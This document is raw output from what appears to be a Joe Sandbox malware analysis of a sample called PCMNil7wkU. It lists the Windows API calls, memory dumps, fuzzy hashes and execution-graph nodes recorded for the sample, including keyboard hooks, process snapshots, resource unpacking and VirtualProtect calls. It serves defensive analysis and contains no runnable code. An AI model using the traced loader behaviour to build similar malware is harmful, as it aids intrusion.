                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,04137FA0,-000000F7,?,00000000,04137B5A,?,-00000010,?), ref: 04137F3E
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 04137F53
                                                                                                    • GetPropA.USER32(00000000,00000000), ref: 04137F6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: d7e27c0d3e9885d1be2a2595ba35f4ac1b58d464aa453354d082914b685cd7ef
                                                                                                    • Instruction ID: 6b8213b4c6d50e21c52f0abe183f829683a14049f110bef7addf5d465c474eb4
                                                                                                    • Opcode Fuzzy Hash: d7e27c0d3e9885d1be2a2595ba35f4ac1b58d464aa453354d082914b685cd7ef
                                                                                                    • Instruction Fuzzy Hash: 16F0A0B1A0213277A6207BA69EC087F199CAE0079A705C161FD60C20D0DB18FD8151B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(?), ref: 04136FD5
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,04133C39,?,04132CF5), ref: 04136FDE
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 04136FF3
                                                                                                    • GetPropA.USER32(?,00000000), ref: 0413700A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: 6551f2ce029fe679928a3614183918c6a6ac361aecc1c4af92a9ba1c417a6d33
                                                                                                    • Instruction ID: ea766a0b90e031267e0d38c8bca6150e20ab4e385a5ab194979e96dd15deee00
                                                                                                    • Opcode Fuzzy Hash: 6551f2ce029fe679928a3614183918c6a6ac361aecc1c4af92a9ba1c417a6d33
                                                                                                    • Instruction Fuzzy Hash: 71F0A0B9B00190A6EB30BBF56CC082B26DC8A056A63008861FE10C71C1DB65FC4092B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04152514
                                                                                                    • SetWindowsHookExA.USER32(00000003,041524B8,00000000,00000000), ref: 04152524
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0415253F
                                                                                                    • CreateThread.KERNEL32(00000000,000003E8,0415245C,00000000,00000000), ref: 04152563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1195359707-0
                                                                                                    • Opcode ID: 36579eb908b4612483d9e0b575ed2057a98aaabc1e9f27d311cf5ddc25fbb25e
                                                                                                    • Instruction ID: 21b9a77931a6422373b5f01ca942d2afef63dd246bf47a135b0e223154f3ec48
                                                                                                    • Opcode Fuzzy Hash: 36579eb908b4612483d9e0b575ed2057a98aaabc1e9f27d311cf5ddc25fbb25e
                                                                                                    • Instruction Fuzzy Hash: 3FF03A71A80380EEF724AB21AC97F9536A4DB00B95F1090A5F6146A0D0CBFA3CC88E25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 04127621
                                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 04127633
                                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 0412763E
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0412764F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2013942131-0
                                                                                                    • Opcode ID: 5705b044e0b66b9c3d434127ca13b470357f94cbb0691aa57a59605873c043b2
                                                                                                    • Instruction ID: 92f0c46c6280bb6cc70d90f34b8d68a49eedc0dd4caf059819047aeec4a1b0b9
                                                                                                    • Opcode Fuzzy Hash: 5705b044e0b66b9c3d434127ca13b470357f94cbb0691aa57a59605873c043b2
                                                                                                    • Instruction Fuzzy Hash: 52E0266160313032F62032691ED0BAB3A4C8F022A4F080191FC68EA3C0DB45FE2083F6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 041214D8: EnterCriticalSection.KERNEL32(?,04121515), ref: 041214DC
                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,041223EC,?,00000000,04122414), ref: 04122327
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 041223C9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                    • String ID: Default
                                                                                                    • API String ID: 249151401-753088835
                                                                                                    • Opcode ID: abf3d92d5df4f7f644cd90ad1b48eab9d6a563553d00d002a8225e3666661801
                                                                                                    • Instruction ID: 079ee6e911423ffdf59d9f9c0b818762238ab3cb27ccd0422d0d7a117f63d025
                                                                                                    • Opcode Fuzzy Hash: abf3d92d5df4f7f644cd90ad1b48eab9d6a563553d00d002a8225e3666661801
                                                                                                    • Instruction Fuzzy Hash: 84618C30A04298DFEB15CFA8C6C0B9EBBF5AF49304F1580E5E840E7291D774AE54CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e145db8344ecaf7d665082d2719af41129192a5e5180b8de3f8a8eb96481aaa
                                                                                                    • Instruction ID: 6cb1bad69c74831db0594e04bd7520a244a4e5c48ec1f9c29a70c1c46dff9ab4
                                                                                                    • Opcode Fuzzy Hash: 8e145db8344ecaf7d665082d2719af41129192a5e5180b8de3f8a8eb96481aaa
                                                                                                    • Instruction Fuzzy Hash: 59A1E6767106005BE719AA7C9CC43ADB3C29B85765F18C6BEE115CB2C0EBEEE9458384
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0410A6DA), ref: 0410A672
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0410A6DA), ref: 0410A678
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 2aba3c0f2127e8063e4b8fe38bae94514bf046838910b4737b5b82f52d1a18e4
                                                                                                    • Instruction ID: b37305f3c24365b97a48b701e292eb259122635431359153992dc2ffcf8c5213
                                                                                                    • Opcode Fuzzy Hash: 2aba3c0f2127e8063e4b8fe38bae94514bf046838910b4737b5b82f52d1a18e4
                                                                                                    • Instruction Fuzzy Hash: BE218675A002189FEB14EF94C9C1AAE73F8EF19740F4184A5E905E72D0DBB4BE40CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$EqualIntersect
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3291753422-2766056989
                                                                                                    • Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                    • Instruction ID: 654fa0c981ef3be7356df9020ce7f0b1f43247acebc0dc3bf414f475318085e7
                                                                                                    • Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                    • Instruction Fuzzy Hash: 71115E31A04258ABD711DBACC8C4BDEBBECAF49259F0842A1EC54EB392D775E905C7D0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412AF86
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412AF98
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromPoint
                                                                                                    • API String ID: 1792783759-1072306578
                                                                                                    • Opcode ID: 7ac25556bd7ff13d02db66c82c01d7a713d10b92d0c372d7d879bd284f379ac7
                                                                                                    • Instruction ID: 33072049cf1c8e65ce94ba0612273953bdceab023935c03b8ddfb220cb7d56cf
                                                                                                    • Opcode Fuzzy Hash: 7ac25556bd7ff13d02db66c82c01d7a713d10b92d0c372d7d879bd284f379ac7
                                                                                                    • Instruction Fuzzy Hash: 7D01A271300264AFEB008E55DA84B9DBB65FF857D5F004014F904DB242D7BCACA987E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412AE61
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412AE6D
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromRect
                                                                                                    • API String ID: 1792783759-4033241945
                                                                                                    • Opcode ID: d1cadc6517028421ab0c06b03dcd0b2c580eac22edbbf60bb2371e7beef58011
                                                                                                    • Instruction ID: 572f2698212cf884db717eb2ad2a10e3543bd262210a10423218e420c40217f0
                                                                                                    • Opcode Fuzzy Hash: d1cadc6517028421ab0c06b03dcd0b2c580eac22edbbf60bb2371e7beef58011
                                                                                                    • Instruction Fuzzy Hash: 63016232300264ABFB948E15DAC4B5ABBA9DF807D9F048491E905DB141C778EC96CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(?), ref: 0412ADEA
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    • GetSystemMetrics.USER32(?), ref: 0412ADB0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: GetSystemMetrics
                                                                                                    • API String ID: 1792783759-96882338
                                                                                                    • Opcode ID: d9bd21f8bb6d614c0668df046be815098e3b38beac192bf09af443a0e1f63945
                                                                                                    • Instruction ID: 8fed0d9a3a1e9fc7e70ebbef7a4474223e18342b7c51b737f61f5d05ec09d5f0
                                                                                                    • Opcode Fuzzy Hash: d9bd21f8bb6d614c0668df046be815098e3b38beac192bf09af443a0e1f63945
                                                                                                    • Instruction Fuzzy Hash: C5F0F0703101A84FEB148A38DBC42223555EF892F2F404B22E311C61C4E7FDBCA4D240
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000010), ref: 04133203
                                                                                                    • GetKeyState.USER32(00000011), ref: 04133214
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State
                                                                                                    • String ID:
                                                                                                    • API String ID: 1649606143-3916222277
                                                                                                    • Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                    • Instruction ID: 86c8843ddc61d2008a466a09339efb38268172103bee10b915a722a4ef7b9e22
                                                                                                    • Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                    • Instruction Fuzzy Hash: 8FE02222B0078922F612B8A82C803E713804F537AAF0843AAFFE05A0C1E386391191A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 04158C5C
                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 04158C8C
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 04158CAB
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 04158CB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 3448952669-0
                                                                                                    • Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                    • Instruction ID: 62bb2f53f3caf9fd76be93528e5f16f13b2e35dd3bcfcc054938a994b2a48568
                                                                                                    • Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                    • Instruction Fuzzy Hash: F321CDB0641219DBDF10EE28CCC0BEEB7B8EB80321F008551EE20A7384D774F82186A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6%
                                                                                                    Dynamic/Decrypted Code Coverage:1.2%
                                                                                                    Signature Coverage:4.5%
                                                                                                    Total number of Nodes:1255
                                                                                                    Total number of Limit Nodes:34
                                                                                                    execution_graph 17684 31b10890 17685 31b108b1 17684->17685 17686 31b1097a 17685->17686 17689 31b14f62 17685->17689 17692 31b150ea 17685->17692 17695 31b19130 17689->17695 17694 31b19130 VirtualProtect 17692->17694 17693 31b1510b 17694->17693 17697 31b19143 17695->17697 17699 31b191e0 17697->17699 17700 31b19228 VirtualProtect 17699->17700 17702 31b14f84 17700->17702 17703 31b193b8 17704 31b193f8 FindCloseChangeNotification 17703->17704 17706 31b19429 17704->17706 17707 40cbdd 17708 40cbe9 _getenv 17707->17708 17748 40d534 HeapCreate 17708->17748 17711 40cc46 17750 41087e GetModuleHandleW 17711->17750 17715 40cc57 __RTC_Initialize 17784 411a15 17715->17784 17716 40cbb4 _fast_error_exit 62 API calls 17716->17715 17718 40cc66 17719 40cc72 GetCommandLineA 17718->17719 17907 40e79a 17718->17907 17799 412892 17719->17799 17725 40cc8c 17726 40cc90 17725->17726 17727 40cc98 17725->17727 17729 40e79a __amsg_exit 62 API calls 17726->17729 17824 41255f 17727->17824 17731 40cc97 17729->17731 17731->17727 17732 40cca1 17734 40e79a __amsg_exit 62 API calls 17732->17734 17733 40cca9 17839 40e859 17733->17839 17736 40cca8 17734->17736 17736->17733 17737 40ccb0 17738 40ccb5 17737->17738 17739 40ccbc 17737->17739 17740 40e79a __amsg_exit 62 API calls 17738->17740 17845 4019f0 OleInitialize 17739->17845 17742 40ccbb 17740->17742 17742->17739 17743 40ccd8 17744 40ccea 17743->17744 17925 40ea0a 17743->17925 17928 40ea36 17744->17928 17747 40ccef _getenv 17749 40cc3a 17748->17749 17749->17711 17899 40cbb4 17749->17899 17751 410892 17750->17751 17752 410899 17750->17752 17931 40e76a 17751->17931 17754 410a01 17752->17754 17755 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 17752->17755 17990 410598 17754->17990 17758 4108ec TlsAlloc 17755->17758 17760 40cc4c 17758->17760 17761 41093a TlsSetValue 17758->17761 17760->17715 17760->17716 17761->17760 17762 41094b 17761->17762 17935 40ea54 17762->17935 17767 41046e __encode_pointer 6 API calls 17768 41096b 17767->17768 17769 41046e __encode_pointer 6 API calls 17768->17769 17770 41097b 17769->17770 17771 41046e __encode_pointer 6 API calls 17770->17771 17772 41098b 17771->17772 17952 40d564 17772->17952 17779 4104e9 __decode_pointer 6 API calls 17780 4109df 17779->17780 17780->17754 17781 4109e6 17780->17781 17972 4105d5 17781->17972 17783 4109ee GetCurrentThreadId 17783->17760 18296 40e1d8 17784->18296 17786 411a21 GetStartupInfoA 17787 411cba __calloc_crt 62 API calls 17786->17787 17793 411a42 17787->17793 17788 411c60 _getenv 17788->17718 17789 411bdd GetStdHandle 17798 411ba7 17789->17798 17790 411c42 SetHandleCount 17790->17788 17791 411cba __calloc_crt 62 API calls 17791->17793 17792 411bef GetFileType 17792->17798 17793->17788 17793->17791 17795 411b2a 17793->17795 17793->17798 17794 411b53 GetFileType 17794->17795 17795->17788 17795->17794 17797 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 17795->17797 17795->17798 17796 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 17796->17798 17797->17795 17798->17788 17798->17789 17798->17790 17798->17792 17798->17796 17800 4128b0 GetEnvironmentStringsW 17799->17800 17801 4128cf 17799->17801 17802 4128c4 GetLastError 17800->17802 17803 4128b8 17800->17803 17801->17803 17804 412968 17801->17804 17802->17801 17805 4128eb GetEnvironmentStringsW 17803->17805 17806 4128fa WideCharToMultiByte 17803->17806 17807 412971 GetEnvironmentStrings 17804->17807 17808 40cc82 17804->17808 17805->17806 17805->17808 17811 41295d FreeEnvironmentStringsW 17806->17811 17812 41292e 17806->17812 17807->17808 17809 412981 17807->17809 17914 4127d7 17808->17914 17813 411c75 __malloc_crt 62 API calls 17809->17813 17811->17808 17814 411c75 __malloc_crt 62 API calls 17812->17814 17815 41299b 17813->17815 17816 412934 17814->17816 17817 4129a2 FreeEnvironmentStringsA 17815->17817 17818 4129ae ___crtGetEnvironmentStringsA 17815->17818 17816->17811 17819 41293c WideCharToMultiByte 17816->17819 17817->17808 17822 4129b8 FreeEnvironmentStringsA 17818->17822 17820 412956 17819->17820 17821 41294e 17819->17821 17820->17811 17823 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 17821->17823 17822->17808 17823->17820 17825 412568 17824->17825 17828 41256d _strlen 17824->17828 18297 41446b 17825->18297 17827 411cba __calloc_crt 62 API calls 17834 4125a2 _strlen 17827->17834 17828->17827 17831 40cc9d 17828->17831 17829 412600 17830 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 17829->17830 17830->17831 17831->17732 17831->17733 17832 411cba __calloc_crt 62 API calls 17832->17834 17833 412626 17835 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 17833->17835 17834->17829 17834->17831 17834->17832 17834->17833 17836 40ef42 _strcpy_s 62 API calls 17834->17836 17837 4125e7 17834->17837 17835->17831 17836->17834 17837->17834 17838 40e61c __invoke_watson 10 API calls 17837->17838 17838->17837 17840 40e867 __IsNonwritableInCurrentImage 17839->17840 18702 413586 17840->18702 17842 40e885 __initterm_e 17844 40e8a4 __IsNonwritableInCurrentImage __initterm 17842->17844 18706 40d2bd 17842->18706 17844->17737 17846 401ab9 17845->17846 18806 40b99e 17846->18806 17848 401abf 17849 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 17848->17849 17875 402467 17848->17875 17850 401dc3 FindCloseChangeNotification GetModuleHandleA 17849->17850 17858 401c55 17849->17858 18819 401650 17850->18819 17852 401e8b FindResourceA LoadResource LockResource SizeofResource 17853 40b84d _malloc 62 API calls 17852->17853 17854 401ebf 17853->17854 18821 40af66 17854->18821 17856 401c9c CloseHandle 17856->17743 17857 401ecb _memset 17859 401efc SizeofResource 17857->17859 17858->17856 17861 401cf9 Module32Next 17858->17861 17860 401f5f 17859->17860 17863 401f1c 17859->17863 17864 401560 __VEC_memcpy 17860->17864 17865 401f92 _memset 17860->17865 17861->17850 17872 401d0f 17861->17872 17863->17860 18859 401560 17863->18859 17864->17865 17866 401fa2 FreeResource 17865->17866 17867 40b84d _malloc 62 API calls 17866->17867 17868 401fbb SizeofResource 17867->17868 17869 401fe5 _memset 17868->17869 17870 4020aa LoadLibraryA 17869->17870 17871 401650 17870->17871 17873 40216c GetProcAddress 17871->17873 17872->17856 17874 401dad Module32Next 17872->17874 17873->17875 17876 4021aa 17873->17876 17874->17850 17874->17872 17875->17743 17876->17875 18833 4018f0 17876->18833 17878 40243f 17878->17875 17879 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 17878->17879 17879->17875 17880 4021f1 17880->17878 18845 401870 17880->18845 17882 402269 VariantInit 17883 401870 75 API calls 17882->17883 17884 40228b VariantInit 17883->17884 17885 4022a7 17884->17885 17886 4022d9 SafeArrayCreate SafeArrayAccessData 17885->17886 18850 40b350 17886->18850 17889 40232c 17890 402354 SafeArrayDestroy 17889->17890 17898 40235b 17889->17898 17890->17898 17891 402392 SafeArrayCreateVector 17892 4023a4 17891->17892 17893 4023bc VariantClear VariantClear 17892->17893 18852 4019a0 17893->18852 17896 40242e 17897 4019a0 65 API calls 17896->17897 17897->17878 17898->17891 17900 40cbc2 17899->17900 17901 40cbc7 17899->17901 17902 40ec4d __FF_MSGBANNER 62 API calls 17900->17902 17903 40eaa2 __NMSG_WRITE 62 API calls 17901->17903 17902->17901 17904 40cbcf 17903->17904 17905 40e7ee _malloc 3 API calls 17904->17905 17906 40cbd9 17905->17906 17906->17711 17908 40ec4d __FF_MSGBANNER 62 API calls 17907->17908 17909 40e7a4 17908->17909 17910 40eaa2 __NMSG_WRITE 62 API calls 17909->17910 17911 40e7ac 17910->17911 17912 4104e9 __decode_pointer 6 API calls 17911->17912 17913 40cc71 17912->17913 17913->17719 17915 4127f1 GetModuleFileNameA 17914->17915 17916 4127ec 17914->17916 17918 412818 17915->17918 17917 41446b ___initmbctable 106 API calls 17916->17917 17917->17915 19124 41263d 17918->19124 17920 412874 17920->17725 17922 411c75 __malloc_crt 62 API calls 17923 41285a 17922->17923 17923->17920 17924 41263d _parse_cmdline 72 API calls 17923->17924 17924->17920 19136 40e8de 